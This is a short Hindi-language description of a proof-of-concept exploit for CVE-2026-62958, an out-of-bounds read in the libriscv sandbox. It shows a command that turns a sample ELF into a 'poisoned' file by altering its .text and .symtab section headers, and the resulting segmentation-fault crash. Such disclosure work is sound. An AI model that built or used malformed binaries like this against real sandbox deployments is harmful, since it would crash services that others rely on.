
CVE-2026-62958 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट जो Libriscv सैंडबॉक्स में एक आउट-ऑफ-बाउंड्स रीड भेद्यता प्रदर्शित करता है, एक तैयार ELF बाइनरी के माध्यम से सैंडबॉक्स क्रैश को सक्षम करता है।
लिब्रिस्कव में एक कमजोरी है जो हमलावर को आउट ऑफ बाउंड्स रीड का उपयोग करके सैंडबॉक्स को क्रैश करने की अनुमति देती है।
दुष्ट एल्फ बनाने के लिए:
python3 poc.py samplefile poisoned_file
परिणाम:
❯ python3 poc.py fib poisoned_file
Manipulating .text section header at offset 0x250
Manipulating .symtab section header at offset 0x710
❯ ./rvlinux poisoned_file
fish: Job 1, './rvlinux poisoned_file' terminated by signal SIGSEGV (Address boundary error)